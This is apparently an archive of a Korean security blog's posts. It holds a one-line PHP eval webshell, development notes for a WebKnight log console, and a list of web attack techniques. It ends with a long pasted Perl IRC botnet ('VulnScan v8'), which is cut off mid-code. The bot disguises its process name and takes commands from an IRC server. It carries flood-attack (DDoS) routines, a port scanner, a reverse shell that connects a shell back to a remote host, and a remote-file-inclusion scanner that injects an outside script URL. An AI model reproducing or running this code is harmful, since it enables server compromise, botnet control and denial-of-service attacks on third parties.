<?eval($_REQUEST[c])?> 

최근에 발견하는 웹쉘은 거의 다 한줄짜리고 사용하는 함수는 eval뿐이다. 한동안 웹쉘이 종합선물세트마냥 많은 기능을 포함했다면 요즘엔 그런 기능들을 클라이언트에서 처리하는듯하다.
장단점이 있을거다 전자는 ids에서 탐지하기 어렵고 후자는 서버진단시에 발견하기 어렵다
당장에 eval함수를 제한하면 이런 방식의 웹쉘에서 안전할 수 있다. 그런데 eval을 대신할 수 있는 함수는 많다. 

'webhxxx > webshell' 카테고리의 다른 글

w3af asp webshell[수정]  (0) 2010.01.21
Posted by applicationlayer
:


 남은것 룰백업, 롤백기능 

'webhxxx > 연구과제' 카테고리의 다른 글

111121_진행상황  (0) 2011.11.21
input 자동완성 방지  (0) 2011.11.21
111117_진행상황 (webknight console)  (0) 2011.11.18
111106_진행상황 (webknight console)  (0) 2011.11.06
111102bugfix  (0) 2011.11.02
Posted by applicationlayer
:
summary메뉴 추가할 것들

total event - table chart의 bar로 표현

system event 또는 log
date/time - level - description
 

'webhxxx > 연구과제' 카테고리의 다른 글

111125_진행상황 (WebKnight Console)  (2) 2011.11.25
input 자동완성 방지  (0) 2011.11.21
111117_진행상황 (webknight console)  (0) 2011.11.18
111106_진행상황 (webknight console)  (0) 2011.11.06
111102bugfix  (0) 2011.11.02
Posted by applicationlayer
:
이거  안쓰면 짜증난다.
<form autocomplete="off">

'webhxxx > 연구과제' 카테고리의 다른 글

111125_진행상황 (WebKnight Console)  (2) 2011.11.25
111121_진행상황  (0) 2011.11.21
111117_진행상황 (webknight console)  (0) 2011.11.18
111106_진행상황 (webknight console)  (0) 2011.11.06
111102bugfix  (0) 2011.11.02
Posted by applicationlayer
:
서버에 webknight로그가 쌓이면 자동으로 메일일 뿌려주는 에이전트 개발
-> 모니터링 중이 아니더라도 메일을 통해 이벤트확인이 가능

주요함수 
FindFirstChangeNotification
FindNextChangeNotification
WaitForMultipleObjects



 // agent.cpp : Defines the entry point for the console application.
//

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <tchar.h>
#include <Wininet.h>

int _tmain(int argc, _TCHAR* argv[])
{
HANDLE dwChangeHandles[1];
DWORD dwWaitStatus; 
HINTERNET hInternet;
HINTERNET hURL;
HINTERNET hRequest;
BOOL bRet;

dwChangeHandles[0] = FindFirstChangeNotification(L"C:\\Program Files\\AQTRONIX Webknight\\LogFiles",TRUE,FILE_NOTIFY_CHANGE_SIZE);

if(dwChangeHandles[0] == INVALID_HANDLE_VALUE)
{
printf("\nerror: unexpected null from findfirstchangenotification.\n");
ExitProcess(GetLastError());
}
if(dwChangeHandles[0] == NULL)
{
 printf("\n ERROR: Unexpected NULL from FindFirstChangeNotification.\n");
 ExitProcess(GetLastError());
}
while(TRUE)
{
printf("\nWaiting for notification...\n");
dwWaitStatus = WaitForMultipleObjects(1,dwChangeHandles,FALSE,INFINITE); 
    switch (dwWaitStatus)
    {
      case WAIT_OBJECT_0:
            printf("\nchange log size\n");

hInternet = InternetOpen(L"WebKnightConsoleAgent",INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
hURL = InternetConnect(hInternet,L"192.168.230.130",80,L"",L"",INTERNET_SERVICE_HTTP,0,0);
hRequest = HttpOpenRequest(hURL,L"GET",L"/LogAnalysis.php?no=1&mail=1",NULL,NULL,NULL,0,0);

bRet = HttpSendRequest(hRequest,NULL,0,NULL,0);
            if ( FindNextChangeNotification(dwChangeHandles[0]) == FALSE )
            {
               printf("\n ERROR: FindNextChangeNotification function failed.\n");
               ExitProcess(GetLastError()); 
            }
            break; 
      case WAIT_TIMEOUT:
            printf("\nNo changes in the timeout period.\n");
            break;
      default: 
            printf("\n ERROR: Unhandled dwWaitStatus.\n");
            ExitProcess(GetLastError());
            break;
    }
  }





return 0;
}

'webhxxx > 연구과제' 카테고리의 다른 글

111121_진행상황  (0) 2011.11.21
input 자동완성 방지  (0) 2011.11.21
111106_진행상황 (webknight console)  (0) 2011.11.06
111102bugfix  (0) 2011.11.02
dynamic gauge(google chart) for snmp  (0) 2011.11.01
Posted by applicationlayer
:



구글차트는 인터넷 익스플로러에서 돌아가기는하나 그래픽이 부드럽지 않게 보이고 상대적으로 버벅인다. 역시 크롬에서 가장 매끄러운 화면을 보여준다.

구글 게이지차트와 윈도우snmp를 연동하는 작업을 했는데 상당히 애를 먹었다. 결국에 정석대로 코딩을 하면 문제없는 것인데 인터넷에는 꼼수가 너무 많이 나온다. 그리고 서적도 이런부분에 대해서 정확하게 언급하지 않는다. 웹프로그래밍 자체가 문법에 많이 관대하다보니 이런 문제가 생기는듯

남은것
[완료]서버 cpu,mem,traffic체크기능
[완료]구글맵 마커 디자인 - 그냥 구글꺼쓰기로.. 귀찮다
윈도우서버 에이전트
webknight conf 리스트박스 콤보박스 관련 기능
각 서버로그 통계
[완료]서버 추가 ui
[완료]서버 삭제 기능
Additional info클릭시 전문 출력



'webhxxx > 연구과제' 카테고리의 다른 글

input 자동완성 방지  (0) 2011.11.21
111117_진행상황 (webknight console)  (0) 2011.11.18
111102bugfix  (0) 2011.11.02
dynamic gauge(google chart) for snmp  (0) 2011.11.01
111031_진행상황 (webknight console)  (0) 2011.10.31
Posted by applicationlayer
:

111102bugfix

webhxxx/연구과제 2011. 11. 2. 12:38 |
Loganalysis.php
날짜 증가시 한자리일 경우 0을 붙여 두자리수로 수정
Posted by applicationlayer
:

구글에서 제공하는 게이지차트를 사용해서 원격 서버의 트래픽을 그래프로 출력할 수 있다.
위 소스는 인터넷검색을 통해 받았으며 랜덤함수를 사용하여 그래프가 동적으로 변한다. 이부분만 수정하면 된다.
예)
  setInterval(function() {
    data.setValue(0, 1, Number(getHttprequest('snmpproc.php?id=cpu&snmpserver=<?=$servername?>')));
    chart.draw(data, options);
  }, 10000);
  setInterval(function() {
    data.setValue(1, 1,Number(getHttprequest('snmpproc.php?id=network&snmpserver=<?=$servername?>')));
    chart.draw(data, options);
  }, 10000);
  setInterval(function() {
    data.setValue(2, 1,Number(getHttprequest('snmpproc.php?id=tcp&snmpserver=<?=$servername?>')));
    chart.draw(data, options);
  }, 10000);
  setInterval(function() {
    data.setValue(3, 1,Number(getHttprequest('snmpproc.php?id=udp&snmpserver=<?=$servername?>')));
    chart.draw(data, options);
  }, 10000);


snmpproc.php예)
<?php
$id=$_GET[id];
$snmpserver=$_GET[snmpserver];
if($id=='cpu'){
        $snmparr = snmpwalk("$snmpserver","public",".1.3.6.1.2.1.25.3.3.1.2");
        $rt = explode(': ',$snmparr[0]);
        echo $rt[1];
}



php에서 snmp관련함수를 사용하기 위해서 snmp를 설치해한다.

yum -y install snmp*
yum -y install php-snmp*

snmp데몬을 실행, apache재시작





snmp관련 자료)
total memory
.1.3.6.1.2.1.25.2.2.0

cpu load
.1.3.6.1.2.1.25.3.3.1.2

snmp관련
http://www.4te.co.kr/91
http://www.chonnom.com/bbs/board.php?bo_table=B19&wr_id=84&page=7
http://www.chonnom.com/bbs/board.php?bo_table=B20&wr_id=115

http://www.nanha.com/index.php?p=b/view&n=776&b=dft

'webhxxx > 연구과제' 카테고리의 다른 글

111106_진행상황 (webknight console)  (0) 2011.11.06
111102bugfix  (0) 2011.11.02
111031_진행상황 (webknight console)  (0) 2011.10.31
IE와 chrome의 차이  (0) 2011.10.31
차트라이브러리  (0) 2011.10.26
Posted by applicationlayer
:

google chart가 IE에서 제대로 보이지 않아 앞으로 chrome을 기준으로 테스트하기로 했다.ㅠ

conf ui 의 체크박스, 텍스트박스는 변경시 xmlhttprequest를 사용하여 변경시키므로 화면이 리플레쉬 되지 않는다 . 리스트박스까지 깔끔하게 적용하려면 ajax를 좀 공부해야할듯




남은것
서버 cpu,mem,traffic체크기능
구글맵 마커 디자인
윈도우서버 에이전트
webknight conf 리스트박스 콤보박스 관련 기능
각 서버로그 통계
서버 추가 ui
서버 삭제 기능

'webhxxx > 연구과제' 카테고리의 다른 글

111102bugfix  (0) 2011.11.02
dynamic gauge(google chart) for snmp  (0) 2011.11.01
IE와 chrome의 차이  (0) 2011.10.31
차트라이브러리  (0) 2011.10.26
지정폴더 감시 API  (0) 2011.10.25
Posted by applicationlayer
:
객체에 접근할때 ie와 chrome의 차이점
ie는 문자열만으로 객체를 지정할 수 있는반면 크롭에서는 함수를 이용한 검색을 통해 가능

예)
<html>
<script>
function XmlSave(InputName,bb,cc)
{
msg = "DEBUG Message:xmlsave function." + InputName.name + "-" + InputName.checked;

alert(msg);
}
</script>
<body>
<input name="Scanning" type="checkbox" onclick="XmlSave(Scanning,'192.168.230.128','8080')" >

IE에서는 실행됨 chrome에서는 실행안됨

아래처럼 사용하면된다
XmlSave(this,'192.168.230.128','8080')" >
 
자신이 아닌 다른 객체에 접근할때는 this를 이용할 수 없는데 그땐 아래 사이트에서 참고하자
http://www.mungchung.com/xe/4197

처음부터 크롬으로 테스트할걸 그랬어 ㅠㅠㅠ

'webhxxx > 연구과제' 카테고리의 다른 글

dynamic gauge(google chart) for snmp  (0) 2011.11.01
111031_진행상황 (webknight console)  (0) 2011.10.31
차트라이브러리  (0) 2011.10.26
지정폴더 감시 API  (0) 2011.10.25
진행상황_111024  (0) 2011.10.24
Posted by applicationlayer
:

'webhxxx > 연구과제' 카테고리의 다른 글

111031_진행상황 (webknight console)  (0) 2011.10.31
IE와 chrome의 차이  (0) 2011.10.31
지정폴더 감시 API  (0) 2011.10.25
진행상황_111024  (0) 2011.10.24
geoip db 추가시  (0) 2011.10.23
Posted by applicationlayer
:

'webhxxx > 연구과제' 카테고리의 다른 글

IE와 chrome의 차이  (0) 2011.10.31
차트라이브러리  (0) 2011.10.26
진행상황_111024  (0) 2011.10.24
geoip db 추가시  (0) 2011.10.23
진행상황  (0) 2011.10.23
Posted by applicationlayer
:

구글맵연동 - 공격자아이피 빈도별로 쉰위를 매긴후 구글맵에 표시_마커아이콘은 만들던가 구하던가 해야지

'webhxxx > 연구과제' 카테고리의 다른 글

차트라이브러리  (0) 2011.10.26
지정폴더 감시 API  (0) 2011.10.25
geoip db 추가시  (0) 2011.10.23
진행상황  (0) 2011.10.23
snmp관련  (0) 2011.10.20
Posted by applicationlayer
:
파일명 지키자;
 [root@localhost html]# ll /usr/local/GeoIP/share/GeoIP/
total 32796
-rw-r--r-- 1 root root  4058575 Oct  3 09:09 GeoIPASNum.dat
-rw-r--r-- 1 root root 28298901 Oct  7 12:49 GeoIPCity.dat
-rw-r--r-- 1 root root  1183408 Oct 18 12:54 GeoIP.dat

'webhxxx > 연구과제' 카테고리의 다른 글

지정폴더 감시 API  (0) 2011.10.25
진행상황_111024  (0) 2011.10.24
진행상황  (0) 2011.10.23
snmp관련  (0) 2011.10.20
구글맵관련  (0) 2011.10.20
Posted by applicationlayer
:

진행상황

webhxxx/연구과제 2011. 10. 23. 14:07 |
webknight 로그수집가능 db적재후 웹출력, 검색기능 추가 완료
(검색인터페이스 ibm proventia참고 ㅋㅋ)

geoip를 이용해 국기그림 출력

계획
geoip로 좌표구하기, googlemap api로 지도에 나타낸후 화면출력

예를들자면


지도그림은 http://techpad.tistory.com/24 에서 퍼옴

 

'webhxxx > 연구과제' 카테고리의 다른 글

진행상황_111024  (0) 2011.10.24
geoip db 추가시  (0) 2011.10.23
snmp관련  (0) 2011.10.20
구글맵관련  (0) 2011.10.20
html 테이블 팁  (0) 2011.10.18
Posted by applicationlayer
:

snmp관련

webhxxx/연구과제 2011. 10. 20. 22:34 |

'webhxxx > 연구과제' 카테고리의 다른 글

geoip db 추가시  (0) 2011.10.23
진행상황  (0) 2011.10.23
구글맵관련  (0) 2011.10.20
html 테이블 팁  (0) 2011.10.18
geoip참고  (0) 2011.10.17
Posted by applicationlayer
:

구글맵관련

webhxxx/연구과제 2011. 10. 20. 20:33 |
참고하자
http://techpad.tistory.com/24

'webhxxx > 연구과제' 카테고리의 다른 글

진행상황  (0) 2011.10.23
snmp관련  (0) 2011.10.20
html 테이블 팁  (0) 2011.10.18
geoip참고  (0) 2011.10.17
ㅔ개ㅓㄷㅊㅅ  (2) 2010.04.29
Posted by applicationlayer
:
테이블 고정 & 글자가 넘어가면 넘어가는 문자를 안보이게 처리
style="white-space:nowrap; overflow:hidden;

'webhxxx > 연구과제' 카테고리의 다른 글

진행상황  (0) 2011.10.23
snmp관련  (0) 2011.10.20
구글맵관련  (0) 2011.10.20
geoip참고  (0) 2011.10.17
ㅔ개ㅓㄷㅊㅅ  (2) 2010.04.29
Posted by applicationlayer
:

geoip참고

webhxxx/연구과제 2011. 10. 17. 20:58 |

 

%%%%%http://blog.daum.net/toddryu/81

http://blog.dasom.pe.kr/20

'webhxxx > 연구과제' 카테고리의 다른 글

진행상황  (0) 2011.10.23
snmp관련  (0) 2011.10.20
구글맵관련  (0) 2011.10.20
html 테이블 팁  (0) 2011.10.18
ㅔ개ㅓㄷㅊㅅ  (2) 2010.04.29
Posted by applicationlayer
:

웹이슈 목록

webhxxx 2011. 1. 10. 13:46 |
하나씩 공부하자
출처;헐랭이,
       http://jeremiahgrossman.blogspot.com/2010/11/calling-all-security-researchers-submit.html
ASP.NET 'Padding Oracle' Crypto Attack
Attacking HTTPS with Cache Injection
Breaking into a WPA network with a webpage
Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
CSS History Hack In Firefox Without JavaScript for Intranet Portscanning
Chrome and Safari users open to stealth HTML5 AppCache attack
Chronofeit Phishing
Converting unimplementable Cookie-based XSS to a persistent attack
Cookie Eviction
Cracking hashes in the JavaScript cloud with Ravan
Cross Site URL Hijacking by using Error Object in Mozilla Firefox
DNS Rebinding on Java Applets
Evercookie
Expanding the Attack Surface
Flash Camera and Mic Remember Function and XSS
Fooling B64_Encode(Payload) on WAFs and filters
Generic cross-browser cross-domain theft
Get Internal Network Information with Java Applets
Google Chrome HTTP AUTH Dialog Spoofing through Realm Manipulation
Hacking Auto-Complete (Safari v1, Safari v2 TabHack, Firefox, Internet Explorer)
How to Conceal XSS Injection in HTML5
IIS5.1 Directory Authentication Bypass by using ":$I30:$Index_Allocation"
IIS6/ASP & file upload for fun and profit
Improving HTTPS Side Channel Attacks
Internal Port Scanning via Crystal Reports
Java Applet Same IP Host Access
Java DSN Rebinding + Java Same IP Policy = The Internet Mayhem
JavaSnoop
Lost in Translation (ASP’s HomoXSSuality)
Mapping a web browser to GPS coordinates via router XSS + Google Location Services without prompting the user
MitM DNS Rebinding SSL/TLS Wildcards and XSS
MySQL Stacked Queries with SQL Injection...sort of
NAT Pinning: Penetrating routers and firewalls from a web page (forcing router to port forward)
Next Generation Clickjacking
No Alnum JavaScript (cheat sheet, jjencode demo)
NoScript Bypass - "Reflective XSS" through Union SQL Poisoning Trick
Non-Obvious (Crypto) Bugs by Example
One vector to rule them all
Penetrating Intranets through Adobe Flex Applications
Performing DDoS attacks with HTML5 Cross Origin Requests & WebWorkers
Persistent Cross Interface Attacks
Poisoning proxy caches using Java/Flash/Web Sockets
Popup & Focus URL Hijacking
Port Scanning with HTML5 and JS-Recon
Posting raw XML cross-domain
Quick Proxy Detection
Re-visiting JAVA De-serialization: It can't get any simpler than this !!
SQLi filter evasion cheat sheet (MySQL)
Side Channel Attacks in SSL
Stealing entire Auto-Complete data in Google Chrome
Stored XSS Vulnerability @ Amazon
Stroke triggered XSS and StrokeJacking
Strokejacking
Tapjacking: owning smartphone browsers
The curse of inverse strokejacking
Turning XSS into Clickjacking
Universal XSS in IE8
Using Cookies For Selective DoS and State Detection
Will it Blend?
XSHM Mark 2
XSS-Track: How to quietly track a whole website through single XSS
XSSing client-side dynamic HTML includes by hiding HTML inside images and more
padding oracle web attack (poet, Padbuster, demo)
phpwn: Attack on PHP sessions and random numbers
출처:최근의 웹 해킹 기술

'webhxxx' 카테고리의 다른 글

Anti-CSRF 우회기법  (0) 2010.10.20
Posted by applicationlayer
:

SharinGan Scanner 1.2.1

webhxxx/weblog 2010. 11. 22. 13:19 |
SharinGan Scanner 1.2.1 이거뭐냐

'webhxxx > weblog' 카테고리의 다른 글

안드로이드 user-agent  (0) 2010.05.11
허니팟  (0) 2010.03.14
Zeroboard4 코드실행 취약점을 이용한 웹쉘공격  (0) 2010.03.09
Pangolin(MSSQL)  (0) 2009.12.18
User-Agent: Mediapartners-Google  (0) 2009.10.01
Posted by applicationlayer
:
## History:
## + Fixed cryptz command (v4.5)
## + Fixed user commands execution by unauthorized user (v4.6) (thx to ajegile)
## + Added options to enable/disable encrypted password (v4.7)
## + Fixed missing hostname on sublink (v4.8)
## + Added links filter to exclude exploiting bad links (v4.9)
## + Fixed private message scanning (v4.9.2) (thx to BLood_roSE)
## + Added spread configuration (v5.0)
## + Updated search engines (v5.1)
## + Added HTTP Error handler for search engines (v5.2)
## + Added more search engines (v5.3) (thx to kaMtiEz, arianom, tukulesto, & Mask_Magician)
## + Added md5 hash & crack tool (v5.4)

'webhxxx > RFI bot' 카테고리의 다른 글

OWASP_Stealing_the_Airlines_Online_Data  (0) 2010.04.25
RFI BotNet관련문서  (0) 2010.04.25
vulscan v8  (0) 2010.04.18
Pitbull Bot  (0) 2010.04.18
FeeLCoMz RFI Scanner Bot v5.3  (0) 2010.04.18
Posted by applicationlayer
:

Anti-CSRF 우회기법

webhxxx 2010. 10. 20. 12:41 |
CSRF방지를 위한 Security Token을 사용하더라도 XSS에 취약할 경우 CSRF공격이 가능하다.

'webhxxx' 카테고리의 다른 글

웹이슈 목록  (0) 2011.01.10
Posted by applicationlayer
:
이런 옵션을 모르고 있었다니 ㅠㅠ 반성해야돼




Posted by applicationlayer
:
User-Agent: Mozilla/5.0 (Linux; U; Android 2.1-update1; ko-kr; XT720 Build/STSKT_N_79.11.36R) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17

'webhxxx > weblog' 카테고리의 다른 글

SharinGan Scanner 1.2.1  (0) 2010.11.22
허니팟  (0) 2010.03.14
Zeroboard4 코드실행 취약점을 이용한 웹쉘공격  (0) 2010.03.09
Pangolin(MSSQL)  (0) 2009.12.18
User-Agent: Mediapartners-Google  (0) 2009.10.01
Posted by applicationlayer
:
ㅔ개ㅓㄷㅊㅅ

'webhxxx > 연구과제' 카테고리의 다른 글

진행상황  (0) 2011.10.23
snmp관련  (0) 2011.10.20
구글맵관련  (0) 2011.10.20
html 테이블 팁  (0) 2011.10.18
geoip참고  (0) 2011.10.17
Posted by applicationlayer
:
재미있는 RFI가 있어서 담아온다

'webhxxx > RFI bot' 카테고리의 다른 글

FeeLCoMz RFI Scanner Bot v5.4  (0) 2010.11.09
RFI BotNet관련문서  (0) 2010.04.25
vulscan v8  (0) 2010.04.18
Pitbull Bot  (0) 2010.04.18
FeeLCoMz RFI Scanner Bot v5.3  (0) 2010.04.18
Posted by applicationlayer
:
RFI BotNet에 대해 자세하게 정리된 문서는 없는것같다

'webhxxx > RFI bot' 카테고리의 다른 글

FeeLCoMz RFI Scanner Bot v5.4  (0) 2010.11.09
OWASP_Stealing_the_Airlines_Online_Data  (0) 2010.04.25
vulscan v8  (0) 2010.04.18
Pitbull Bot  (0) 2010.04.18
FeeLCoMz RFI Scanner Bot v5.3  (0) 2010.04.18
Posted by applicationlayer
:

vulscan v8

webhxxx/RFI bot 2010. 4. 18. 14:29 |
#!/usr/bin/perl
# VulnScan v8 -Final- By Morgan
# Colors by delet
#
# Note:
# DO NOT REMOVE COPYRIGHTS ...
#
# |_|0|_|
# |_|_|0|
# |0|0|0|
#
# New functions :
#                New l33t colors
#                Fixed Google
#
# Scan command :
# !morgan !eval @gstring='google%20dork';
# !morgan @rfiscan vulnfile.php?vulnvar=
#
# DDoS commands :
# Udp : !morgan @udpflood IP packet-size time
# Tcp : !morgan @tcpflood IP port time
# Http: !morgan @httpflood www.website.com time
#
# Greets to :
#
# All irc.root.net.ve - #Morgan users...
#
#
# Enjoy the bot ....
# /Morgan

use HTTP::Request;
use LWP::UserAgent;

################ V8 CONFIGURATION #############################################################
my $processo = 'ps aux';                   # Fake process name for the bot                #
if (`ps uxw` =~ /ps aux/)                    # (CHANGE IT!!!)                               #
{                                              #                                              #
exit;                                          #                                              #
}                                              #                                              #
###############################################################################################
my $linas_max='8';                             # Avoid Flood                                  #
###############################################################################################
my $sleep='5';                                 # sleep time                                   #
##################### IRC #####################################################################
my @adms=("evil");                           # Administrator Nickname                       #
###############################################################################################
my @canais=("#dark");                        # Channel ..if  password -> ("#channel :pass") #
###############################################################################################
my $nick='evil';                             # Nick prefix of the bot example :             #
                                               # vs[v7] = vs[v7]-718727                       #
###############################################################################################
my $ircname = 'evil';                            # Identd of the bot                            #
###############################################################################################
chop (my $realname = `uname -a`);                 # Full Name                                    #
###############################################################################################
$servidor='dos.mygenc.org' unless $servidor;  # Server IRC of the bot                        #
###############################################################################################
my $porta='8889';                              # Server PORT                                  #
################ CMD ##########################################################################
my @cmdgif='http://rzgr.by.ru/cmd.gif';  # If you change this cmd must be same as:      #
                                                     # http://myspace.si/images/sad.gif       #
###############################################################################################

my $VERSAO = 'v8';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);


our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}
# MORGAN OWNED YOUR BOX
#
# morgan.rx@gmail.com
sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
   if (defined($IRC_socket)) {
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
     nick("$meunick");
     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
     sleep 1;
   }
}
my $line_temp;
while( 1 ) {
   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
   delete($irc_servers{''}) if (defined($irc_servers{''}));
   my @ready = $sel_cliente->can_read(0);
   next unless(@ready);
   foreach $fh (@ready) {
     $IRC_cur_socket = $fh;
     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
     $nread = sysread($fh, $msg, 4096);
     if ($nread == 0) {
        $sel_cliente->remove($fh);
        $fh->close;
        delete($irc_servers{$fh});
     }
     @lines = split (/\n/, $msg);

     for(my $c=0; $c<= $#lines; $c++) {
       $line = $lines[$c];
       $line=$line_temp.$line if ($line_temp);
       $line_temp='';
       $line =~ s/\r$//;
       unless ($c == $#lines) {
         parse("$line");
       } else {
           if ($#lines == 0) {
             parse("$line");
           } elsif ($lines[$c] =~ /\r$/) {
               parse("$line");
           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
               parse("$line");
           } else {
               $line_temp = $line;
           }
       }
      }
   }
}

sub parse {
   my $servarg = shift;
   if ($servarg =~ /^PING \:(.*)/) {
     sendraw("PONG :$1");
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
       if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
       }
       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
         if ($onde eq "$meunick"){
           shell("$pn", "$args");
         }
         if ($args =~ /^(\Q$meunick\E|\!morgan)\s+(.*)/ ) {
            my $natrix = $1;
            my $arg = $2;
            if ($arg =~ /^\!(.*)/) {
              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
            } elsif ($arg =~ /^\@(.*)/) {
                $ondep = $onde;
                $ondep = $pn if $onde eq $meunick;
                bfunc("$ondep","$1");
            } else {
                shell("$onde", "$arg");
            }
         }
       }
}
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
       if (lc($1) eq lc($meunick)) {
         $meunick=$4;
         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       }
   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
       nick("$meunick|".int rand(999999));
   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
       $meunick = $2;
       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
       foreach my $canal (@canais) {
         sendraw("JOIN $canal ddosit");
       }
   }
}

# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub bfunc {
  my $printl = $_[0];
  my $funcarg = $_[1];
  if (my $pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my @portas=("21","22","23","25","59","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018","8889");
             my (@aberta, %porta_banner);
     sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2PortScan15) 15(2IP7:12 ".$1." 15) 15(2Status7: 12Searching for Open Ports15)");
             foreach my $porta (@portas)  {
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
                }
             }

             if (@aberta) {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2PortScan15) 15(2Concluido15) 15(2Open Ports7:12 @aberta 15)");
             } else {
               sendraw($IRC_cur_socket,"PRIVMSG $printl :15(7@2PortScan15) 15(2Concluido15) 15(2No open ports found15)");
             }
           }
           if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
     sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2TCP Flood15) 15(2Started15) (2IP7:12 ".$1." 2Porta7:12 ".$2." 2Tempo7:12 ".$3." 2segundos15)");
     my $itime = time;
     my ($cur_time);
             $cur_time = time - $itime;
     while ($3>$cur_time){
             $cur_time = time - $itime;
     &tcpflooder("$1","$2","$3");
             }
     sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2TCP Flood15) 15(2Finished15) (2IP7:12 ".$1." 2Porta7:12 ".$2." 15)");
           }
   if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Versao15) 12Vulnscan 2v87 ");
}

if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);

if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2ConnectBack15) 15(2Connecting15) (2IP7/2Port7:12 $host:$porta 15)");
}
}
#SCANNER
           if ($funcarg =~ /^rfiscan\s+(\d+)\s+(.*)/) {
         $boturl=$2;
   sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Scan15) (2Started15) (2Searching for7:12 ".$boturl." 2Time7:12 ".$1." 2seconds15)");
     srand;
     my $itime = time;
     my ($cur_time);
     my ($exploited);
         $boturl=$2;
             $cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
    $cur_time = time - $itime;
    @urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
 #sendraw($IRC_cur_socket, "PRIVMSG #debug :15(7@2Scan15) 15(2Exploiting7:12 ".$url2." 15)");
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url2 ="http://".$path."/".$boturl."@cmdgif?";
print "\n".$url2."\n\n";


# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com

my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);

if ($response->is_success) {
 if( $response->content =~ /By/ && $response->content =~ /chaos/ ){
 sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Vulnerable15) 15(2Vuln7:12 ".$url2." 15)");
}
}
else {
}
 }
}
     sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Scan15) 15(2Finished15) (2Scan Finished7:12 ".$1." 2seconds15)");
           }
           if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
     sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2HTTP Flood15) (2Started15) (2Victim7:12 ".$1."7:1280 2Time7:12 ".$2." 2seconds15)");
     my $itime = time;
     my ($cur_time);
             $cur_time = time - $itime;
     while ($2>$cur_time){
             $cur_time = time - $itime;
     my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
